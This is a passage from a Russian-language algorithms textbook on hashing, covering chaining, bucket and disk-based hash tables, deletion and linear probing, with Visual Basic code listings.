Если вам нужно время от времени проводить поиск в списке, содержащем десятки элементов, также используйте поиск методом полного перебора. Алгоритм в этом случае будет проще отлаживать и поддерживать, чем более сложные методы поиска, и он будет давать приемлемые результаты.
Если требуется проводить поиск в больших списках, используйте интерполяционный поиск. Если значения данных распределены достаточно равномерно, то интерполяционный поиск обеспечит наилучшую производительность. Если список находится на диске или какомлибо другом медленном устройстве, разница в скорости между интерполяционным поиском и другими методами поиска может быть достаточно велика.
Если используются строковые данные, можно попытаться закодировать их числами в формате integer, long или double, при этом для их поиска можно будет использовать интерполяционный метод. Если строки слишком длинные и не помещаются даже в числа формата double, то проще всего может оказаться использовать двоичный поиск. В табл. 10.1 перечислены преимущества и недостатки для различных методов поиска.
Используя двоичный или интерполяционный поиск, можно очень быстро находить элементы даже в очень больших списках. Если значения данных распределены равномерно, то интерполяционный поиск позволяет всего за несколько шагов найти элемент в списке, содержащем миллион элементов.
@Таблица 10.1 Преимущества и недостатки различных методов поиска.
===========278
Тем не менее, в такой большой список трудно вносить изменения. Вставка или удаление элемента из упорядоченного списка займет время порядка O(N). Если элемент находится в начале списка, выполнение этих операций может потребовать очень большого количества времени, особенно если список находится на какомлибо медленном устройстве.
Если требуется вставлять и удалять элементы из большого списка, следует рассмотреть возможность замены его на другую структуру данных. В 7 главе обсуждаются сбалансированные деревья, вставка и добавление элемента в которые требует времени порядка O(log(N)).
В 11 главе обсуждаются методы, позволяющие выполнять вставку и удаление элементов еще быстрее. Для достижения такой высокой скорости, в этих методах используется дополнительное пространство для хранения промежуточных данных. Хештаблицы не хранят информацию о порядке расположения данных. В хештаблицу можно вставлять, удалять, и находить элементы, но сложно вывести элементы из таблицы по порядку.
Если список будет неизменным, то применение упорядоченного списка и использование метода интерполяционного поиска даст прекрасные результаты. Если требуется часто вставлять и удалять элементы из списка, то стоит рассмотреть возможность применения хештаблицы. Если при этом также нужно выводить элементы по порядку или перемещаться по списку в прямом или обратном направлении, то оптимальную скорость и гибкость может обеспечить применение сбалансированных деревьев. Решив, какие типа операций вам понадобятся, вы можете выбрать алгоритм, который вам лучше всего подходит.
=============279
Глава 11. Хеширование
В предыдущей главе описывался алгоритм интерполяционного поиска, который использует интерполяцию, чтобы быстро найти элемент в списке. Сравнивая искомое значение со значениями элементов в известных точках, этот алгоритм может определить вероятное положение искомого элемента. В сущности, он создает функцию, которая устанавливает соответствие между искомым значением и индексом позиции, в которой он должен находиться. Если первое предположение ошибочно, то алгоритм снова использует эту функцию, делая новое предположение, и так далее, до тех пор, пока искомый элемент не будет найден.
Хеширование (hashing) использует аналогичный подход, отображая элементы в хештаблице (hash table). Алгоритм хеширования использует некоторую функцию, которая определяет вероятное положение элемента в таблице на основе значения искомого элемента.
Например, предположим, что требуется запомнить несколько записей, каждая из которых имеет уникальный ключ со значением от 1 до 100. Для этого можно создать массив со 100 ячейками и проинициализировать каждую ячейку нулевым ключом. Чтобы добавить в массив новую запись, данные из нее просто копируются в соответствующую ячейку массива. Чтобы добавить запись с ключом 37, данные из нее просто копируются в 37 позицию в массиве. Чтобы найти запись с определенным ключом, просто выбирается соответствующая ячейка массива. Для удаления записи ключу соответствующей ячейки массива просто присваивается нулевое значение. Используя эту схему, можно добавить, найти и удалить элемент из массива за один шаг.
К сожалению, в реальных приложениях значения ключа не всегда находятся в небольшом диапазоне. Обычно диапазон возможных значений ключа достаточно велик. База данных сотрудников может использовать в качестве ключа идентификационный номер социального страхования. Теоретически можно было бы создать массив, каждая ячейка которого соответствовала одному из возможных девятизначных чисел; но на практике для этого не хватит памяти или дискового пространства. Если для хранения одной записи требуется 1 килобайт памяти, то такой массив занял бы 1 терабайт (миллион мегабайт) памяти. Даже если можно было бы выделить такой объем памяти, такая схема была бы очень неэкономной. Если штат вашей компании меньше 10 миллионов сотрудников, то более 99 процентов массива будут пусты.
=======281
Чтобы справиться с этой проблемой, схемы хеширования отображают потенциально большое число возможных ключей на достаточно компактную хештаблицу. Если в вашей компании работает 700 сотрудников, вы можете создать хештаблицу с 1000 ячеек. Схема хеширования устанавливает соответствие между 700 записями о сотрудниках и 1000 позициями в таблице. Например, можно располагать записи в таблице в соответствии с тремя первыми цифрами идентификационного номера в системе социального страхования. При этом запись о сотруднике с номером социального страхования 123456789 будет находиться в 123 ячейке таблицы.
Очевидно, что поскольку существует больше возможных значений ключа, чем ячеек в таблице, то некоторые значения ключей могут соответствовать одним и тем же ячейкам таблицы. Например, оба значения 123456789 и 123999999 отображаются на одну и ту же ячейку таблицы 123. Если существует миллиард возможных номеров системы социального страхования, и таблица имеет 1000 ячеек, то в среднем каждая ячейка будет соответствовать миллиону записей.
Чтобы избежать этой потенциальной проблемы, схема хеширования должна включать в себя алгоритм разрешения конфликтов (collision resolution policy), который определяет последовательность действий в случае, если ключ соответствует позиции в таблице, которая уже занята другой записью. В следующих разделах описываются несколько различных методов разрешения конфликтов.
Все обсуждаемые здесь методы используют для разрешения конфликтов примерно одинаковый подход. Они вначале устанавливают соответствие между ключом записи и положением в хештаблице. Если эта ячейка уже занята, они отображают ключ на какуюлибо другую ячейку таблицы. Если она также уже занята, то процесс повторяется снова о тех пор, пока в конце концов алгоритм не найдет пустую ячейку в таблице. Последовательность проверяемых при поиске или вставке элемента в хештаблицу позиций называется тестовой последовательностью (probe sequence).
В итоге, для реализации хеширования необходимы три вещи:
Структура данных (хештаблица) для хранения данных;
Функция хеширования, устанавливающая соответствие между значением ключа и положением в таблице;
Алгоритм разрешения конфликтов, определяющий последовательность действий, если несколько ключей соответствуют одной ячейке таблицы.
В следующих разделах описаны некоторые структуры данных, которые можно использовать для хеширования. Каждая из них имеет соответствующую функцию хеширования и один или более алгоритмов разрешения конфликтов. Так же, как и в большинстве компьютерных алгоритмов, каждый из этих методов имеет свои преимущества и недостатки. В последнем разделе описаны преимущества и недостатки разных методов, чтобы помочь вам выбрать наилучший для данной ситуации метод хеширования.
Связывание
Один из методов разрешения конфликтов заключается в хранении записей, которые занимают одинаковое положение в таблице, в связных списках. Чтобы добавить в таблицу новую запись, при помощи функции хеширования выбирается связный список, который должен его содержать. Затем запись добавляется в этот список.
На рис. 11.1 показан пример связывания хештаблицы, которая содержит 10 ячеек. Функция хеширования отображает ключ K на ячейку K Mod 10 в массиве. Каждая ячейка массива содержит указатель на первый элемент связного списка. При вставке элемента в таблицу он помещается в соответствующий список.
======282
@Рис. 11.1. Связывание
Чтобы создать хештаблицу в Visual Basic, используйте оператор ReDim для размещения сигнальных меток начала списков. Если вы хотите создать в хештаблице NumLists связных списков, задайте размер массива ListTops при помощи оператора ReDim ListTops(0 To NumLists - 1). Первоначально все списки пусты, поэтому указатель NextCell каждой метки должен иметь значение Nothing. Если вы используете для изменения массива меток оператор ReDim, то Visual Basic автоматически инициализирует указатели NextCell значением Nothing.
Чтобы найти в хештаблице элемент с ключом K, нужно вычислить K Mod NumLists, получив индекс метки связного списка, который может содержать искомый элемент. Затем нужно просмотреть список до тех пор, пока искомый элемент не будет найден или процедура не дойдет до конца списка.
Global Const HASH_FOUND = 0
Global Const HASH_NOT_FOUND = 1
Global Const HASH_INSERTED = 2
Private Function LocateItemUnsorted(Value As Long) As Integer
Dim cell As ChainCell
' Получить вершину связного списка.
Set cell = m_ListTops(Value Mod NumLists).NextCell
Do While Not (cell Is Nothing)
If cell.Value = Value Then Exit Do
Set cell = cell.NextCell
Loop
If cell Is Nothing Then
LocateItemUnsorted = HASH_NOT_FOUND
Else
LocateItemUnsorted = HASH_FOUND
End If
End Function
Функции для вставки и удаления элементов из связных списков аналогичны функциям, описанным во 2 главе.
========283
Преимущества и недостатки связывания
Одно из преимуществ этого метода состоит в том, что при его использовании хештаблицы никогда не переполняются. При этом вставка и поиск элементов всегда выполняется очень просто, даже если элементов в таблице очень много. Для некоторых методов хеширования, описанных ниже, производительность значительно падает, если таблица почти заполнена.
Из хештаблицы, которая использует связывание, также просто удалять элементы, при этом элемент просто удаляется из соответствующего связного списка. В некоторых других схемах хеширования удалить элемент непросто или невозможно.
Один из недостатков связывания состоит в том, что если число связных списков недостаточно велико, то размер списков может стать большим, при этом для вставки или поиска элемента необходимо будет проверить большое число элементов списка. Если хештаблица содержит 10 связных списков и к ней добавляется 1000 элементов, то средняя длина связного списка будет равна 100. Чтобы найти элемент в таблице, придется проверить порядка 100 ячеек.
Можно немного ускорить поиск, если использовать упорядоченные списки. Тогда можно использовать для поиска элементов в упорядоченных связных списках методы, описанные в 10 главе. Это позволяет прекратить поиск, если во время его выполнения встретится элемент со значением, большим искомого. В среднем потребуется проверить только половину связного списка, чтобы найти элемент или определить, что его нет в списке.
Private Function LocateItemSorted(Value As Long) As Integer
Dim cell As ChainCell
' Получить вершину связного списка.
Set cell = m_ListTops(Value Mod NumLists).NextCell
Do While Not (cell Is Nothing)
If cell.Value >= Value Then Exit Do
Set cell = cell.NextCell
Loop
If cell Is Nothing Then
LocateItemSorted = HASH_NOT_FOUND
ElseIf cell.Value = Value Then
LocateItemSorted = HASH_FOUND
Else
LocateItemSorted = HASH_NOT_FOUND
End If
End Function
Использование упорядоченных списков позволяет ускорить поиск, но не снимает настоящую проблему, связанную с переполнения таблицы. Лучшим, но более трудоемким решением будет создание хештаблицы большего размера и повторное хеширование элементов в новой таблице так, чтобы связные списки в ней имели меньший размер. Это может занять довольно много времени, особенно если списки записаны на диске или какомлибо другом медленном устройстве, а не в памяти.
========284
В программе Chain реализована хештаблица со связыванием. Введите число списков в поле области Table Creation (Создание таблицы) на форме и установите флажок Sort Lists (Упорядоченные списки), если вы хотите, чтобы программа использовала упорядоченные списки. Затем нажмите на кнопку Create Table (Создать таблицу). Затем вы можете ввести новые значения и снова нажать на кнопку Create Table, чтобы создать новую хештаблицу.
Так как интересно изучать хештаблицы, содержащие большое число значений, то программа Chain позволяет заполнять таблицу случайными элементами. Введите число элементов, которые вы хотите создать и максимальное значение элементов в области Random Items (Случайные элементы), затем нажмите на кнопку Create Items (Создать элементы), и программа добавит в хештаблицу случайно созданные элементы.
И, наконец, введите значение в области Search (Поиск). Если вы нажмете на кнопку Add (Добавить), то программа вставит элемент в хештаблицу, если он еще не находится в ней. Если вы нажмете на кнопку Find (Найти), то программа выполнит поиск элемента в таблице.
После завершения операции поиска или вставки, программа выводит статус операции в нижней части формы — была ли операция успешной и число проверенных во время ее выполнения элементов.
В строке статуса также выводится средняя длина успешной (если элемент есть в таблице) и безуспешной (если элемента в таблице нет) тестовых последовательностей. Программа вычисляет эти значения, выполняя поиск для всех чисел между единицей и наибольшим числом в хештаблице, и затем подсчитывая среднее значение длины тестовой последовательности.
На рис. 11.2 показано окно программы Chain после успешного поиска элемента 414.
Блоки
Другой способ разрешения конфликтов заключается в том, чтобы выделить ряд блоков, каждый из которых может содержать несколько элементов. Для вставки элемента в таблицу, он отображается на один из блоков и затем помещается в этот блок. Если блок уже заполнен, то используется обработка переполнения.
@Рис. 11.2. Программа Chain
======285
Возможно, самый простой метод обработки переполнения состоит в том, чтобы поместить все лишние элементы в специальные блоки в конце массива «нормальных» блоков. Это позволяет при необходимости легко увеличивать размер хештаблицы. Если требуется больше дополнительных блоков, то размер массива блоков просто увеличивается, и в конце массива создаются новые дополнительные блоки.
Например, чтобы добавить новый элемент K в хештаблицу, которая содержит пять блоков, вначале мы пытаемся поместить его в блок с номером K Mod 5. Если этот блок заполнен, элемент помещается в дополнительный блок.
Чтобы найти элемент в таблице, вычислим K Mod 5, чтобы найти его положение, и затем выполним поиск в этом блоке. Если элемента в этом блоке нет, и блок не заполнен, значит элемента в хештаблице нет. Если элемента в блоке нет и блок заполнен, необходимо проверить дополнительные блоки.
На рис. 11.3 показаны пять блоков с номерами от 0 до 4 и один дополнительный блок. Каждый блок может содержать по 5 элементов. В этом примере в хештаблицу были вставлены следующие элементы: 50, 13, 10 ,72, 25, 46, 68, 30, 99, 85, 93, 65, 70. При вставке элементов 65 и 70 блоки уже были заполнены, поэтому эти элементы были помещены в первый дополнительный блок.
Чтобы реализовать метод блочного хеширования в Visual Basic, можно использовать для хранения блоков двумерный массив. Если требуется NumBuckets блоков, каждый из которых может содержать BucketSize ячеек, выделим память под блоки при помощи оператора ReDim TheBuckets(0 To BucketSize -1, 0 To NumBuckets - 1). Второе измерение соответствует номеру блока. Оператор Visual Basic ReDim позволяет изменить только размер массива, поэтому номер блока должен быть вторым измерением массива.
Чтобы найти элемент K, вычислим номер блока K Mod NumBuckets. Затем проведем поиск в блоке до тех пор, пока не найдется искомый элемент, или пустая ячейка блока, или блок не закончится. Если элемент найден, поиск завершен. Если встретится пустая ячейка, значит элемента в хештаблице нет, и процесс также завершен. Если проверен весь блок, и не найден искомый элемент или пустая ячейка, требуется проверить дополнительные блоки.
@Рис. 11.3. Хеширование с использованием блоков
======286
Public Function LocateItem(Value As Long, _
bucket_probes As Integer, item_probes As Integer) As Integer
Dim bucket As Integer
Dim pos As Integer
bucket_probes = 1
item_probes = 0
' Определить, к какому блоку он относится.
bucket = (Value Mod NumBuckets)
' Поиск элемента или пустой ячейки.
For pos = 0 To BucketSize - 1
item_probes = item_probes + 1
If Buckets(pos, bucket).Value = UNUSED Then
LocateItem = HASH_NOT_FOUND ' Элемент отсутствует.
Exit Function
End If
If Buckets(pos, bucket).Value = Value Then
LocateItem = HASH_FOUND ' Элемент найден.
Exit Function
End If
Next pos
' Проверить дополнительные блоки.
For bucket = NumBuckets To MaxOverflow
bucket_probes = bucket_probes + 1
For pos = 0 To BucketSize - 1
item_probes = item_probes + 1
If Buckets(pos, bucket).Value = UNUSED Then
LocateItem = HASH_NOT_FOUND ' Not here.
Exit Function
End If
If Buckets(pos, bucket).Value = Value Then
LocateItem = HASH_FOUND ' Элемент найден.
Exit Function
End If
Next pos
Next bucket
' Если элемент до сих пор не найден, то его нет в таблице.
LocateItem = HASH_NOT_FOUND
End Function
======287
Программа Bucket демонстрирует этот метод. Эта программа очень похожа на программу Chain, но она использует блоки, а не связные списки. Когда эта программа выводит длину тестовой последовательности, она показывает число проверенных блоков и число проверенных элементов в блоках. На рис. 11.4 показано окно программы после успешного поиска элемента 661 в первом дополнительном блоке. В этом примере программа проверила 9 элементов в двух блоках.
Хранение хештаблиц на диске
Многие запоминающие устройства, такие как стримеры, дисководы и жесткие диски, могут считывать большие куски данных за одно обращение к устройству. Обычно эти блоки имеют размер 512 или 1024 байта. Чтение всего блока данных занимает столько же времени, сколько и чтение одного байта.
Если имеется большая хештаблица, записанная на диске, то этот факт можно использовать для улучшения производительности. Доступ к данным на диске занимает намного больше времени, чем доступ к данным в памяти. Если сразу загружать все элементы блока, то можно будет прочитать их все во время одного обращения к диску. После того, как все элементы окажутся в памяти, их проверка может выполняться намного быстрее, чем если бы пришлось их считывать с диска по одному.
Если для чтения элементов с диска используется цикл For, то Visual Basic будет обращаться к диску при чтении каждого элемента. С другой стороны, можно использовать оператор Visual Basic Get для чтения всего блока сразу. При этом потребуется всего одно обращение к диску, и программа будет выполняться намного быстрее.
Можно создать тип данных, который будет содержать массив элементов, представляющий блок. Так как во время работы программы нельзя изменять размер массива в определенном пользователем типе, то необходимо заранее определить, сколько элементов сможет находиться в блоке. При этом возможности изменения размеров блоков ограничены по сравнению с предыдущим вариантом алгоритма.
Global Const ITEMS_PER_BUCKET = 10 ' Число элементов в блоке.
Global Const MAX_ITEM = 9 ' ITEMS_PER_BUCKET - 1.
Type ItemType
Value As Long
End Type
Global Const ITEM_SIZE = 4 ' Размер данных этого типа.
Type BucketType
Item(0 To MAX_ITEM) As ItemType
End Type
Global Const BUCKET_SIZE = ITEMS_PER_BUCKET * ITEM_SIZE
Перед тем, как начать чтение данных из файла, он открывается для произвольного доступа:
Open filename For Random As #DataFile Len = BUCKET_SIZE
=========288
@Рис. 11.4. Программа Bucket
Для удобства работы можно написать функции для чтения и записи блоков. Эти функции читают и пишут данные в глобальную переменную TheBucket, которая содержит данные одного блока. После того, как данные загружены в эту переменную, можно выполнить поиск среди элементов этого блока в памяти.
Так как при произвольном обращении к файлу записи нумеруются с единицы, а не с нуля, то эти функции должны добавлять к номеру блока в хештаблице единицу перед считыванием данных из файла. Например, нулевому блоку в хештаблице будет соответствовать запись с номером 1.
Private Sub GetBucket(num As Integer)
Get #DataFile, num + 1, TheBucket
End Sub
Private Sub PutBucket(num As Integer)
Put #DataFile, num + 1, TheBucket
End Sub
Используя функции GetBucket и PutBucket, можно переписать процедуру поиск в хештаблице для чтения записей из файла:
Public Function LocateItem(Value As Long, _
bucket_probes As Integer, item_probes As Integer) As Integer
Dim bucket As Integer
Dim pos As Integer
item_probes = 0
' Определить, к какому блоку принадлежит элемент.
GetBucket Value Mod NumBuckets
bucket_probes = 1
' Поиск элемента или пустой ячейки.
For pos = 0 To MAX_ITEM
item_probes = item_probes + 1
If TheBucket.Item(pos).Value = UNUSED Then
LocateItem = HASH_NOT_FOUND ' Элемента нет в таблице.
Exit Function
End If
If TheBucket.Item(pos).Value = Value Then
LocateItem = HASH_FOUND ' Элемент найден.
Exit Function
End If
Next pos
' Проверить дополнительные блоки
For bucket = NumBuckets To MaxOverflow
' Проверить следующий дополнительный блок.
GetBucket bucket
bucket_probes = bucket_probes + 1
For pos = 0 To MAX_ITEM
item_probes = item_probes + 1
If TheBucket.Item(pos).Value = UNUSED Then
LocateItem = HASH_NOT_FOUND ' Элемента нет.
Exit Function
End If
If TheBucket.Item(pos).Value = Value Then
LocateItem = HASH_FOUND ' Элемент найден.
Exit Function
End If
Next pos
Next bucket
' Если элемент все еще не найден, его нет в таблице.
LocateItem = HASH_NOT_FOUND
End Function
Программа Bucket2 аналогична программе Bucket, но она хранит блоки на диске. Она также не вычисляет и не выводит на экран среднюю длину тестовой последовательности, так как эти вычисления потребовали бы большого числа обращений к диску и сильно замедлили бы работу программы.
============290
Так как при обращении к блокам происходит чтение с диска, а обращение к элементам блока происходит в памяти, то число проверяемых блоков гораздо сильнее влияет на время выполнения программы, чем полное число проверенных элементов. Для сравнения среднего числа проверенных блоков и элементов при поиске элементов можно использовать программу Bucket.
Каждый блок в программе Bucket2 может содержать до 10 элементов. Это позволяет легко вставлять элементы в блоки до тех пор, пока они не переполнятся. В реальной программе следует попытаться поместить в блок максимально возможное число элементов так, чтобы размер блока оставался при этом равным целому числу кластеров диска.
Например, можно читать данные блоками по 1024 байта. Если элемент данных имеет размер 44 байта, то в один блок может поместиться 23 элемента данных, и при этом размер блока будет меньше 1024 байт.
Global Const ITEMS_PER_BUCKET = 23 ' Число элементов в блоке.
Global Const MAX_ITEM = 22 ' ITEMS_PER_BUCKET - 1.
Type ItemType
LastName As String * 20 ' 20 байт.
FirstName As String * 20 ' 20 байт.
EmloyeeId As Long ' 4 байта (это ключ).
End Type
Global Const ITEM_SIZE = 44 Размер данных этого типа.
Type BucketType
Item(0 To MAX_ITEM) As ItemType
End Type
Global Const BUCKET_SIZE = ITEMS_PER_BUCKET * ITEM_SIZE
Размещение в каждом блоке большего числа элементов позволяет считывать больше данных при каждом обращении к диску. При этом в таблице также может быть больше элементов, прежде чем будет необходимо использовать дополнительные блоки. Доступ к дополнительным блокам требует дополнительных обращений к диску, поэтому следует по возможности избегать его.
С другой стороны, если блоки достаточно велики, то они могут содержать большое число пустых ячеек. Если данные неравномерно распределены по блокам, то одни блоки могут быть переполнены, а другие — практически пусты. Использование другого варианта размещения с большим числом блоков меньшего размера может уменьшить эту проблему. Даже если некоторые блоки все еще будут переполнены, а некоторые пусты, то почти пустые блоки будут иметь меньший размер, потому они не будут содержать так много пустых ячеек.
На рис. 11.5 показаны два варианта расположения одних и тех же данных в блоках. В расположении наверху используются 5 блоков, каждый из которых содержит по 5 элементов. При этом дополнительные блоки не используются, и всего имеется 12 пустых ячеек. Расположение внизу использует 10 блоков, каждый из которых содержит по 2 элемента. В нем имеется 9 пустых ячеек и один дополнительный блок.
========291
@Рис. 11.5. Два варианта расположения элементов в блоках
Это пример пространственновременного компромисса. При первом расположении все элементы расположены в обычных (не дополнительных) блоках, поэтому можно быстро найти любой из них. Второе расположение занимает меньше места, но помещает некоторые элементы в дополнительные блоки, при этом доступ к ним занимает больше времени.
Связывание блоков
Можно использовать другой подход, если при переполнении блоков создавать цепочки из блоков. Для каждого заполненного блока создается своя цепочка блоков, вместо того, чтобы хранить все лишние элементы в одних и тех же дополнительных блоках. При поиске элемента в заполненном блоке нет необходимости проверять элементы в дополнительных блоках, которые были помещены туда в результате переполнения других блоков. Если множество блоков переполнено, то это может сэкономить довольно много времени.
На рис. 11.6 показано применение двух разных схем хеширования для одних и тех же данных. Вверху лишние элементы помещаются в общие дополнительные блоки. Чтобы найти элементы 32 и 30, нужно проверить три блока. Вопервых, проверяется блок, в котором элемент должен находится. Элемента в этом блоке нет, поэтому проверяется первый дополнительный блок, в котором элемента тоже нет. Поэтому требуется проверить второй дополнительный блок, в котором, наконец, находится искомый элемент.
В нижнем расположении заполненные блоки связаны со своими собственными дополнительными блоками. При таком расположении любой элемент можно найти после обращения не более чем к двум блокам. Как и раньше, вначале проверяется блок, в котором элемент должен находиться. Если его там нет, то проверяется связный список дополнительных блоков. В этом примере чтобы найти искомый элемент нужно проверить только один дополнительный блок.
=========292
@Рис. 11.6. Связные дополнительные блоки
Если дополнительные блоки хештаблицы содержит большое число элементов, то организация цепочек из дополнительных блоков может сэкономить достаточно много времени. Предположим, что имеется относительно большая хештаблица, содержащая 1000 блоков, в каждом из которых находится 10 элементов. Предположим также, что в дополнительных блоках находится 1000 элементов, для которых понадобится 100 дополнительных блоков. Чтобы найти один из последних элементов в дополнительных блоках, потребуется проверить 101 блок.
Более того, предположим, что мы пытались найти элемент K, которого нет в таблице, но который должен был бы находиться в одном из заполненных блоков. В этом случае пришлось бы проверить все 100 дополнительных блоков, прежде чем выяснилось бы, что элемент отсутствует в таблице. Если программа часто пытается найти элементы, которых нет в таблице, то значительная часть времени будет тратиться на проверку дополнительных блоков.
Если дополнительные блоки связаны между собой и ключевые значения распределены равномерно, то можно будет находить элементы намного быстрее. Если максимальное число дополнительных элементов для одного блока равно 10, то каждый блок может иметь не больше одного дополнительного. В этом случае можно найти элемент или определить, что его нет в таблице, проверив не более двух блоков.
С другой стороны, если хештаблица только слегка переполнена, то многие блоки будут иметь дополнительные блоки, содержащие всего один или два элемента. Допустим, что в каждом блоке должно находиться 11 элементов. Так как каждый блок может вместить только 10 элементов, для каждого обычного блока нужно будет создать один дополнительный. В этом случае потребуется 1000 дополнительных блоков, каждый из которых будет содержать всего один элемент, и всего в дополнительных блоках будет 900 пустых ячеек.
Это еще один пример пространственновременного компромисса. Связывание блоков друг с другом позволяет быстрее вставлять и находить элементы, но оно также может заполнять хештаблицу пустыми ячейками. Конечно, можно избежать этой проблемы, создав новую хештаблицу большего размера и разместив в ней все элементы таблицы.
=====293
Удаление элементов
Удаление элементов из блоков сложнее, чем из связных списков, но оно возможно. Вопервых, найдем элемент, который требуется удалить из хештаблицы. Если блок не заполнен, то на место удаленного элемента помещается последний элемент блока, при этом все непустые ячейки блока будет находиться в его начале. Тогда, если при поиске элемента в блоке позднее найдется пустая ячейка, то можно будет заключить, что элемента в таблице нет.
Если блок, содержащий искомый элемент, заполнен, то нужно провести поиск заменяющего его элемента в дополнительных блоках. Если ни один из элементов в дополнительных блоках не принадлежит к данному блоку, то искомый элемент заменяется последним элементом в блоке, и последняя ячейка блока становится пустой.
Иначе, если в дополнительном блоке существует элемент, который принадлежит к данному блоку, то найденный элемент из дополнительного блока помещается на место удаленного элемента. При этом в дополнительном блоке образуется пустое пространство, но это легко исправить — в образовавшуюся пустую ячейку помещается последний элемент из последнего дополнительного блока.
На рис. 11.7 показан процесс удаления элемента из заполненного блока. Вопервых, из блока 0 удаляется элемент 24. Так как блок 0 был заполнен, то нужно попытаться найти элемент из дополнительных блоков, который можно было бы вставить на его место в блок 0. В данном случае блок 0 содержит все четные элементы, поэтому любой четный элемент из дополнительных блоков подойдет. Первый четным элементом в дополнительных блоках будет элемент 14, поэтому можно заменить элементы 24 в блоке 0 элементом 14.
При этом в третьей позиции первого дополнительного блока образуется пустая ячейка. Заполним ее последним элементом из последнего дополнительного блока, в данном случае элементом 79. В этот момент хештаблица снова готова к работе.
Другой метод состоит в том, чтобы вместо удаления элемента помечать его как удаленный. Для поиска элементов в таком блоке нужно игнорировать удаленные элементы. Если позднее в блок будут добавляться новые элементы, можно будет помещать их на место элементов, помеченных как удаленные.
@Рис. 11.7. Удаление элемента из блока
=========294
Быстрее и легче вместо удаления элемента просто помечать его как удаленный, но, в конце концов, таблица может оказаться заполненной неиспользуемыми ячейками. Если добавить в хештаблицу ряд элементов и затем удалить большинство из них в порядке первый вошел — первый вышел, то расположение элементов в блоках может оказаться «перевернутым». Большая часть настоящих данных будет находиться в конце блоков и в дополнительных блоках. Добавлять новые элементы в таблицу будет просто, но при поиске элемента довольно много времени будет тратиться на пропуск удаленных элементов.
В качестве компромисса при удалении элемента из блока можно перемещать последний элемент блока на освободившееся место и затем помечать последний элемент блока как удаленный. Тогда при поиске в блоке можно прекратить дальнейший поиск в блоке, если при этом встретится элемент, помеченный, как удаленный. После этого можно провести поиск в дополнительных блоках, если они существуют.
Преимущества и недостатки применения блоков
Вставка и удаление элемента в хештаблицу с блоками выполняется достаточно быстро, даже если таблица почти заполнена. Фактически, хештаблица, использующая блоки, обычно будет быстрее, чем таблица со связыванием (связыванием из предыдущей главы, а не связыванием блоков). Если хештаблица находится на диске, блочный алгоритм может считывать за одно обращение к диску весь блок. При использовании связных списков, следующий элемент может находиться на диске не обязательно рядом с предыдущим. При этом для каждой проверки элемента потребуется обращение к диску.
Удаление элемента из таблицы сложнее выполнить с использованием блоков, чем при применении связных списков. Чтобы удалить элемент из заполненного блока, может понадобиться проверить все дополнительные блоки в поиске элемента, который нужно поместить на его место.
И еще одно преимущество хештаблицы, использующей блоки, состоит в том, что если таблица переполняется, то можно легко увеличить ее размер. Когда все дополнительные блоки заполнятся, можно просто изменить размер массива и создать в его конце новый дополнительный блок.
Если многократно увеличивать размер таблицы подобным образом, то большая часть данных может находиться в дополнительных блоках. Тогда для того, чтобы найти или вставить элемент, потребуется проверить множество блоков, и производительность упадет. В этом случае, может быть лучше создать новую хештаблицу с большим числом основных блоков и поместить элементы в нее.
Открытая адресация
Иногда элементы данных слишком велики, чтобы их было удобно размещать в блоках. Если требуется список из 1000 элементов, каждый из которых занимает на диске 1 Мбайт, может быть сложно использовать блоки, которые содержали бы более одного или двух элементов. Если каждый из блоков будет содержать всего один или два элемента, то для поиска или вставки элемента потребуется проверить множество блоков.
При использовании открытой адресации (open addressing) хешфункция используется для непосредственного вычисления положения элементов данных в массиве. Например, можно использовать в качестве хештаблицы массив с нижним индексом 0 и верхним 99. Тогда хешфункция может сопоставлять ключу со значением K индекс массива, равный K Mod 100. При этом элемент со значением 1723 окажется в таблице на 23 позиции. Затем, когда понадобится найти элемент 1723, проверяется 23 позиция в массиве.
==========295
Различные схемы открытой адресации используют разные методы для формирования тестовых последовательностей. В следующих разделах рассматриваются три наиболее важных метода: линейная, квадратичная и псевдослучайная проверка.
Линейная проверка
Если позиция, на которую отображается новый элемент в массиве, уже занята, то можно просто просмотреть массив с этой точки до тех пор, пока не найдется незанятая позиция. Этот метод разрешения конфликтов называется линейной проверкой (linear probing), так как при этом таблица просматривается последовательно.
Рассмотрим снова пример, в котором имеется массив с нижней границей 0 и верхней границей 99, и хешфункция отображает элемент K в позицию K Mod 100. Чтобы вставить элемент 1723, вначале проверяется позиция 23. Если эта ячейка заполнена, то проверяется позиция 24. Если она также занята, то проверяются позиции 25, 26, 27 и так далее до тех пор, пока не найдется свободная ячейка.
Чтобы вставить новый элемент в хештаблицу, применяется выбранная тестовая последовательность до тех пор, пока не будет найдена пустая ячейка. Чтобы найти элемент в таблице, применяется выбранная тестовая последовательность до тех пор, пока не будет найден элемент или пустая ячейка. Если пустая ячейка встретится раньше, значит элемент в хештаблице отсутствует.
Можно записать комбинированную функцию проверки и хеширования:
Hash(K, P) = (K + P) Mod 100 где P = 0, 1, 2, ...
Здесь P — число элементов в тестовой последовательности для K. Другими словами, для хеширования элемента K проверяются элементы Hash(K, 0), Hash(K, 1), Hash(K, 2), … до тех пор, пока не найдется пустая ячейка.
Можно обобщить эту идею для создания таблицы размера N на основе массива с индексами от 0 до N - 1. Хешфункция будет иметь вид:
Hash(K, P) = (K + P) Mod N где P = 0, 1, 2, ...
Следующий код показывает, как выполняется поиск элемента при помощи линейной проверки:
Public Function LocateItem(Value As Long, pos As Integer, _
probes As Integer) As Integer
Dim new_value As Long
probes = 1
pos = (Value Mod m_NumEntries)
Do
new_value = m_HashTable(pos)
' Элемент найден.
If new_value = Value Then
LocateItem = HASH_FOUND
Exit Function
End If
' Элемента в таблице нет.
If new_value = UNUSED Or probes >= NumEntries Then
LocateItem = HASH_NOT_FOUND
pos = -1
Exit Function
End If
pos = (pos + 1) Mod NumEntries
probes = probes + 1
Loop
End Function
Программа Linear демонстрирует открытую адресацию с линейной проверкой. Заполнив поле Table Size (Размер таблицы) и нажав на кнопку Create table (Создать таблицу), можно создавать хештаблицы различных размеров. Затем можно ввести значение элемента и нажать на кнопку Add (Добавить) или Find (Найти), чтобы вставить или найти элемент в таблице.
Чтобы добавить в таблицу сразу несколько случайных значений, введите число элементов, которые вы хотите добавить и максимальное значение, которое они могут иметь в области Random Items (Случайные элементы), и затем нажмите на кнопку Create Items (Создать элементы).
После завершения программой какойлибо операции она выводит статус операции (успешное или безуспешное завершение) и длину тестовой последовательности. Она также выводит среднюю длину успешной и безуспешной тестовой последовательностей. Программа вычисляет среднюю длину тестовой последовательности, выполняя поиск всех значений от 1 до максимального значения в таблице.
